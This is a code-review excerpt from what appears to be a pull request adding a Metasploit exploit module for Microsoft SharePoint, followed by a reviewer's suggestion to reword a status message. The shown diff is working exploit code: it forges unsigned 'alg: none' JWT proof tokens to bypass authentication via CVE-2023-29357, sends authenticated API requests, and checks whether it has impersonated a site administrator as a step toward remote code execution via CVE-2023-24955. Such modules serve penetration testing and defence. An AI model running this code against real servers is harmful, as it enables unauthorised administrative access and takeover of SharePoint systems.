modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb

```diff
@@ -0,0 +1,372 @@
+      b64_token = Rex::Text.encode_base64(jwt_token)
+      "eyJhbGciOiAibm9uZSJ9.#{b64_token}.YWFh"
+    else
+      gen_token_sid(url, @SID)
+    end
+  end
+
+  def send_get_request(url)
+    vprint_status('send get request')
+    token = gen_app_proof_token(url)
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, url),
+      'method' => 'GET',
+      'headers' => {
+        'X-PROOF_TOKEN' => token,
+        'Authorization' => "Bearer #{token}",
+        'HOST' => datastore['HOSTNAME']
+      }
+    })
+  end
+
+  def send_json_request(url, data)
+    vprint_status('send json request')
+    token = gen_app_proof_token(url)
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, url),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-PROOF_TOKEN' => token,
+        'Authorization' => "Bearer #{token}",
+        'HOST' => datastore['HOSTNAME']
+      },
+      'data' => data.to_json
+    })
+  end
+
+  def get_current_user
+    res = send_get_request('/_api/web/currentuser')
+    if res&.code != 200
+      print_error('Failed to get current user')
+      return false
+    end
+    res.body
+  end
+
+  def check
+    version = sharepoint_get_version
+    return CheckCode::Safe('Could not determine the Sharepoint version') if version.nil?
+
+    print_status("Sharepoint version detected: #{version}")
+
+    begin
+      ntlm_response = resolve_target_info
+      hostname = ntlm_response['MSV_AV_DNS_COMPUTER_NAME'].split('.')[0]
+      domain = ntlm_response['MSV_AV_NP_DOMAIN_NAME']
+
+      print_status("Discovered hostname is: #{hostname}")
+      print_status("Discovered domain is: #{domain}")
+
+      @realm, @client_id = get_oauth_info
+      print_status("Got Oauth Info: #{@realm}|#{@client_id}")
+      @lob_id = Rex::Text.rand_text_alpha(rand(8))
+      print_status("Lob id is: #{@lob_id}")
+    rescue InvalidResponse => e
+      return CheckCode::Safe(e)
+    end
+
+    current_user = get_current_user
+
+    if current_user != false
+      current_user =~ %r{<d:LoginName>(.+)</d:LoginName>}
+      return CheckCode::Safe('Unable to identify the LoginName of the current user') unless Regexp.last_match(1)
+
+      @user = Regexp.last_match(1)
+      return CheckCode::Safe('Unable to parse the username from the LoginName received from the target') unless current_user.include?('|')
+
+      @user = current_user.split('|')[1]
+    else
+      return CheckCode::Safe('Unable to identify the current user')
+    end
+
+    if current_user.include?('true</d:IsSiteAdmin>')
+      print_status("Successfully impersonated Site Admin: #{@user}")
+      CheckCode::Vulnerable('Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.')
+    else
+      CheckCode::Safe('The user found is not a site admin.')
```

Comment:
```suggestion
      CheckCode::Safe('Authentication was successfully bypassed via CVE-2023-29357, but the user found is not a site admin. You might want to try with another user.')
```

The auth bypass is still a success.